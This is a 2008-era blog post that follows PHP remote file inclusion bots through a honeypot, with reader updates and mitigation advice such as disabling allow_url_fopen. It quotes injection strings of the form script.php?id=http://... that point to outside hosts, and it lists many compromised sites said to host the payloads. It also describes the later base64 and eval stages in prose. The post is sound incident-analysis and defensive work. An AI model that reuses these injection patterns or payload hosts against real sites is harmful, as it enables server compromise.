David Thomas Baker » Web » Catching and Preventing echo md5(\"just_a_test\"); exploit attempts

which all seem to revolve around finding poorly written PHP code.

The robots are replacing script.php?id=4 entries with urls like:

script.php?id=http://concorduae.com/oldtaifgate/articles/qozevuc/gofadur/
and
script.php?id=http://mslayouts.ws/icons/administrator/components/com_menus/aruyi/iyuxuyi/

All these landing pages have:

<?php echo md5("just_a_test");?>

on them. If you have a browse around these obviously hacked sites there is some other interesting code. eg: http://concorduae.com/oldtaifgate/articles/qozevuc/

im changing a script which gets hit a few times a day to actually see what the bot will do when it finds the output from the echo md5() statement.

...

Here's what happens when the initial just_a_test exploit attempt is successful:

My fake exploitable script was hit 7 times by the robots. Each hit was from different ip addresses and using different compromised hosts for the initial just_a_test remote file code. Each robot was presented with the output from echo md5("just_a_test");

The robots didn't seem to do anything straight after seeing that the site was exploitable, but 8 hours later I received 60 hits from robots trying to inject a different bit of code:
http://www.municipioxii.it/sunnyway/eheqebi/tigogo/a/ and http://www.cjp.spb.ru/en/tis/geze/a/ and so on.. (all ending in /a/ )

The time lapse between initial attempts and follow up attempts leads me to believe that the initial robots communicate back to a central server when they find an exploitable host. More robots are then scheduled to come back to the exploitable host and try to move to the next level.

This code file they were trying to inject contains a lot of white space with some PHP code in the middle. Here's the formated PHP code if you want to have a look:

click to view step 2 code

Step 2 php code creates a new file with the contents from base64_decode. The file is called namogofer.php and if tries to create this file in every directory under the document root. When step 2 successfully creates a file on the server it will ouput a tab separated list of information about where the file is loaced, and continue. The contents of the namogofer.php file which get written to the web server are here:

click to view step 3 code

As you can see Step 3 code is waiting for a special file upload. The next round of attacks will involve uploading another php file to the server in the form of a normal file upload. The code will be dumped in the /tmp directory like all file uploads are, and then the code will be eval()'d

I'll update again once I catch the uploaded code.

UPDATE:

I'm seeing about 100 hits a day and growing on this topic. If anybody knows the true nature of this exploit attempt or how so many websites have been compromised tell me about it and i'll post it here. dtbaker @ gmail. com

UPDATE:

More compromised hosts (2008-02-06):

http://www.heaven-house.kz/templates_c/sexes/afacub/
http://www.felixtorresycia.com/admin/correo/enaq/ecib/
http://sans-packing.ru/img/jipeqap/ehudute/
http://www.thoseguysfilms.com/forums/templates/subSilver/images/uza/laqipu/
http://www.soeasywebsite.com/soeasycasino/ixu/xotem/
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/
http://www.municipioxii.it/sunnyway/eheqebi/jahibop/
http://www.asigurareamea.ro/upload_fisiere/agihixu/bezodan/
http://www.obrasmecanicasch.com/omch/img/itofu/viroja/

UPDATE:

From Jonathan Dill

Digging through web logs, there has been a surge in this type of
activity lately, but it appears to be run of the mill index.php
attempted remote file inclusion exploit, as long as you have PHP
configured with allow_url_fopen = 'off' you should be OK. Newer PHP
uses a "wrapper" which allows you to restrict what can be included, or
you can recode to use cURL instead of url_fopen.

Here are some relevant articles:

http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml

Docs from PHP website:
http://us2.php.net/filesystem

See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html

Recommendations

You should disable allow_url_fopen in the php.ini file:

; Disable allow_url_fopen for security reasons
allow_url_fopen = 'off'

The setting can also be disabled in apache's httpd.conf file:

# Disable allow_url_fopen for security reasons
php_flag allow_url_fopen off

For remote file access, consider using the cURL functions that PHP provides.

UPDATE:

I have made a number of scripts output echo md5("just_a_test"); when they see these automated exploit attempts.
Hopefully I will catch one soon and will be able to see what the next step in the remote file inclusion exploit is.�

Mark: some info about Wordpress and this exploit: http://news.go41.de/events/php-echo-md5-just_a_test-what-is-that/

Mark: a .htaccess snippet that stops url's from being passed into any scripts: http://news.go41.de/events/md5-just_a_test-htaccess-solution/ (not sure if this will affect any legit stuff - do any popular wordpress etc.. scripts require url's to be passed as parameters -like referral link counters etc...)

I have received quite a few emails from people who have had their servers compromised by this attack.

Seems the overall goal of this attack is to infect .htaccess and javascript files with as little impact on normal website functionality as possible. When visitors navigate to the infected site via search engines the users browsing experience is altered so the attacker can build revenue from PPC vendors.

[snip]

Our server seems to have been exploited by this code. The payload seemed to be a redirection script that takes any search referrals from Google, Yahoo, etc and then creates a pseudo blog page promoting some paid advertising where the blog owner gets a commission on the clicks.

The PPC vendor is (in this instance) PeakClick www.peakclick.com. They don't appear to be involved in this.

[/snip]

For those who are digging around - you can find and report straight to the PPC vendors and request for them to disabled the accounts of the user who is exploiting this attack.

Will post some infected javascript snippets soon..